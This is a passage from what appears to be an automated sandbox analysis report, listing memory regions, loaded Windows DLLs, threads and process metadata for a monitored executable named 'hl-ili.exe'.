"\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 18038 start_va = 0x2320000 end_va = 0x2320fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002320000" filename = "" Region: id = 18047 start_va = 0x7ffb60c90000 end_va = 0x7ffb60cfefff monitored = 0 entry_point = 0x7ffb60cb5f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 18048 start_va = 0x7ffb53310000 end_va = 0x7ffb5331cfff monitored = 0 entry_point = 0x7ffb53311ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 18049 start_va = 0x7ffb53f10000 end_va = 0x7ffb53feafff monitored = 0 entry_point = 0x7ffb53f228b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 18050 start_va = 0x7ffb5def0000 end_va = 0x7ffb5df1cfff monitored = 0 entry_point = 0x7ffb5df09d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 18053 start_va = 0x7ffb53ee0000 end_va = 0x7ffb53f05fff monitored = 0 entry_point = 0x7ffb53ee1cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 18058 start_va = 0x7ffb53be0000 end_va = 0x7ffb53bf1fff monitored = 0 entry_point = 0x7ffb53be3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 18059 start_va = 0x2320000 end_va = 0x2320fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002320000" filename = "" Region: id = 18062 start_va = 0x2320000 end_va = 0x2320fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002320000" filename = "" Thread: id = 115 os_tid = 0x10d0 Thread: id = 116 os_tid = 0x1248 Thread: id = 117 os_tid = 0x11c8 Thread: id = 118 os_tid = 0x103c Thread: id = 119 os_tid = 0xfbc Thread: id = 120 os_tid = 0xf30 Thread: id = 121 os_tid = 0x13e8 Thread: id = 122 os_tid = 0xcf8 Process: id = "14" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x7b741000" os_pid = "0x848" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18300 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18301 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18302 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18303 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18304 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18305 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18306 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18307 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18308 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "hl-ili.exe" filename = "\\Program Files (x86)\\Xmpxd9\\hl-ili.exe" (normalized: "c:\\program files (x86)\\xmpxd9\\hl-ili.exe") Region: id = 18309 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 18310 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18311 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18312 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 18313 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18314 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 18330 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 18331 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 18332 start_va = 0x6ff50000 end_va = 0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 18333 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18334 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 18335 start_va = 0x4a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 18336 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18337 start_va = 0x74e60000 end_va = 0x74fddfff monitored = 0 entry_point = 0x74f11b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 18338 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18339 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 18340 start_va = 0x5e0000 end_va = 0x69dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18341 start_va = 0x74610000 end_va = 0x746a1fff monitored = 0 entry_point = 0x74650380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 18342 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 18343 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 18344 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 18345 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 18346 start_va = 0x74cb0000 end_va = 0x74df6fff monitored = 0 entry_point = 0x74cc1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 18347 start_va = 0x75130000 end_va = 0x7527efff monitored = 0 entry_point = 0x751e6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 18348 start_va = 0x74780000 end_va = 0x74871fff monitored = 0 entry_point = 0x747b8070 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 18349 start_va = 0x76ff0000 end_va = 0x770adfff monitored = 0 entry_point = 0x77025630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 18350 start_va = 0x74880000 end_va = 0x74a3cfff monitored = 0 entry_point = 0x74962a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 18351 start_va = 0x74ff0000 end_va = 0x7509cfff monitored = 0 entry_point = 0x75004f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 18352 start_va = 0x746c0000 end_va = 0x746ddfff monitored = 0 entry_point = 0x746cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 18353 start_va = 0x746b0000 end_va = 0x746b9fff monitored = 0 entry_point = 0x746b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 18354 start_va = 0x771d0000 end_va = 0x77227fff monitored = 0 entry_point = 0x772125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 18355 start_va = 0x77360000 end_va = 0x773a3fff monitored = 0 entry_point = 0x77379d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 18356 start_va = 0x77260000 end_va = 0x772ecfff monitored = 0 entry_point = 0x772a9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 18357 start_va = 0x6e560000 end_va = 0x6e63ffff monitored = 0 entry_point = 0x6e612d30 region_type = mapped_file name = "opengl32.dll" filename = "\\Windows\\SysWOW64\\opengl32.dll" (normalized: "c:\\windows\\syswow64\\opengl32.dll") Region: id = 18358 start_va = 0x750b0000 end_va = 0x7512afff monitored = 0 entry_point = 0x750ce970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 18359 start_va = 0x702b0000 end_va = 0x702d4fff monitored = 0 entry_point = 0x702cae10 region_type = mapped_file name = "glu32.dll" filename = "\\Windows\\SysWOW64\\glu32.dll" (normalized: "c:\\windows\\syswow64\\glu32.dll") Region: id = 18360 start_va = 0x6e470000 end_va = 0x6e55dfff monitored = 0 entry_point = 0x6e486bd0 region_type = mapped_file name = "ddraw.dll" filename = "\\Windows\\SysWOW64\\ddraw.dll" (normalized: "c:\\windows\\syswow64\\ddraw.dll") Region: id = 18361 start_va = 0x702a0000 end_va = 0x702a6fff monitored = 0 entry_point = 0x702a1fc0 region_type = mapped_file name = "dciman32.dll" filename = "\\Windows\\SysWOW64\\dciman32.dll" (normalized: "c:\\windows\\syswow64\\dciman32.dll") Region: id = 18362 start_va = 0x74c60000 end_va = 0x74ca4fff monitored = 0 entry_point = 0x74c7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 18363 start_va = 0x75bf0000 end_va = 0x76feefff monitored = 0 entry_point = 0x75dab990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 18364 start_va = 0x74b20000 end_va = 0x74b56fff monitored = 0 entry_point = 0x74b23b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 18365 start_va = 0x75600000 end_va = 0x75af8fff monitored = 0 entry_point = 0x75807610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 18366 start_va = 0x77350000 end_va = 0x7735bfff monitored = 0 entry_point = 0x77353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 18367 start_va = 0x773b0000 end_va = 0x773f3fff monitored = 0 entry_point = 0x773b7410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 18368 start_va = 0x74fe0000 end_va = 0x74feefff monitored = 0 entry_point = 0x74fe2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 18369 start_va = 0x75280000 end_va = 0x752ddfff monitored = 0 entry_point = 0x75297470 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\SysWOW64\\FirewallAPI.dll" (normalized: "c:\\windows\\syswow64\\firewallapi.dll") Region: id = 18370 start_va = 0x77970000 end_va = 0x77982fff monitored = 0 entry_point = 0x77971d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 18371 start_va = 0x75b00000 end_va = 0x75beafff monitored = 0 entry_point = 0x75b3d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 18372 start_va = 0x6e3d0000 end_va = 0x6e461fff monitored = 0 entry_point = 0x6e3ddd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 18373 start_va = 0x77870000 end_va = 0x77901fff monitored = 0 entry_point = 0x778a8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 18374 start_va = 0x70230000 end_va = 0x70296fff monitored = 0 entry_point = 0x70245a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 18375 start_va = 0x6e110000 end_va = 0x6e12dfff monitored = 0 entry_point = 0x6e123080 region_type = mapped_file name = "oledlg.dll" filename = "\\Windows\\SysWOW64\\oledlg.dll" (normalized: "c:\\windows\\syswow64\\oledlg.dll") Region: id = 18376 start_va = 0x6e0f0000 end_va = 0x6e108fff monitored = 0 entry_point = 0x6e0ff090 region_type = mapped_file name = "olepro32.dll" filename = "\\Windows\\SysWOW64\\olepro32.dll" (normalized: "c:\\windows\\syswow64\\olepro32.dll") Region: id = 18377 start_va = 0x74360000 end_va = 0x7437afff monitored = 0 entry_point = 0x74369050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 18378 start_va = 0x731a0000 end_va = 0x731aafff monitored = 0 entry_point = 0x731a1d20 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 18379 start_va = 0x7a0000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 18380 start_va = 0x7a0000 end_va = 0x7c9fff monitored = 0 entry_point = 0x7a5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 18381 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 18382 start_va = 0x810000 end_va = 0x997fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 18383 start_va = 0x75450000 end_va = 0x7547afff monitored = 0 entry_point = 0x75455680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 133 os_tid = 0xd18 Thread: id = 135 os_tid = 0xe3c Process: id = "15" image_name = "hl-ili.exe" filename = "c:\\program files (x86)\\xmpxd9\\hl-ili.exe" page_root = "0x73e4c000" os_pid = "0x12d4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18315 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18316 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 18317 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18318 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18319 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18320 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 18321 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18322 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18323 start_va = 0x400000 end_va = 0x49cfff monitored = 1 entry_point = 0x4367cb region_type = mapped_file name = "hl-ili.exe" filename = "\\Program Files (x86)\\Xmpxd9\\hl-ili.exe" (normalized: "c:\\program files (x86)\\xmpxd9\\hl-ili.exe") Region: id = 18324 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 18325 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18326 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18327 start_va = 0x7fff0000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 18328 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18329 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 18384 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 18385 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 18386 start_va = 0x6ff50000 end_va = 0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 18387 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18388 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 18389 start_va = 0x590000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 18390 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 18392 start_va = 0x74e60000 end_va = 0x74fddfff monitored = 0 entry_point = 0x74f11b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 18393 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18394 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 18395 start_va = 0x4a0000 end_va = 0x55dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18396 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 18397 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 18398 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 18399 start_va = 0x6e0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 18400 start_va = 0x74cb0000 end_va = 0x74df6fff monitored = 0 entry_point = 0x74cc1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 18401 start_va = 0x75130000 end_va = 0x7527efff monitored = 0 entry_point = 0x751e6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 18402 start_va = 0x74780000 end_va = 0x74871fff monitored = 0 entry_point = 0x747b8070 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 18403 start_va = 0x76ff0000 end_va = 0x770adfff monitored = 0 entry_point = 0x77025630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 18404 start_va = 0x74880000 end_va = 0x74a3cfff monitored = 0 entry_point = 0x74962a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 18405 start_va = 0x74ff0000 end_va = 0x7509cfff monitored = 0 entry_point = 0x75004f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 18406 start_va = 0x746c0000 end_va = 0x746ddfff monitored = 0 entry_point = 0x746cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 18407 start_va = 0x746b0000 end_va = 0x746b9fff monitored = 0 entry_point = 0x746b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 18408 start_va = 0x6e560000 end_va = 0x6e63ffff monitored = 0 entry_point = 0x6e612d30 region_type = mapped_file name = "opengl32.dll" filename = "\\Windows\\SysWOW64\\opengl32.dll" (normalized: "c:\\windows\\syswow64\\opengl32.dll") Region: id = 18409 start_va = 0x750b0000 end_va = 0x7512afff monitored = 0 entry_point = 0x750ce970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 18410 start_va = 0x77360000 end_va = 0x773a3fff monitored = 0 entry_point = 0x77379d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 18411 start_va = 0x702b0000 end_va = 0x702d4fff monitored = 0 entry_point = 0x702cae10 region_type = mapped_file name = "glu32.dll" filename = "\\Windows\\SysWOW64\\glu32.dll" (normalized: "c:\\windows\\syswow64\\glu32.dll") Region: id = 18412 start_va = 0x6e470000 end_va = 0x6e55dfff monitored = 0 entry_point = 0x6e486bd0 region_type = mapped_file name = "ddraw.dll" filename = "\\Windows\\SysWOW64\\ddraw.dll" (normalized: "c:\\windows\\syswow64\\ddraw.dll") Region: id = 18413 start_va = 0x702a0000 end_va = 0x702a6fff monitored = 0 entry_point = 0x702a1fc0 region_type = mapped_file name = "dciman32.dll" filename = "\\Windows\\SysWOW64\\dciman32.dll" (normalized: "c:\\windows\\syswow64\\dciman32.dll") Region: id = 18414 start_va = 0x771d0000 end_va = 0x77227fff monitored = 0 entry_point = 0x772125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 18415 start_va = 0x77260000 end_va = 0x772ecfff monitored = 0 entry_point = 0x772a9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" 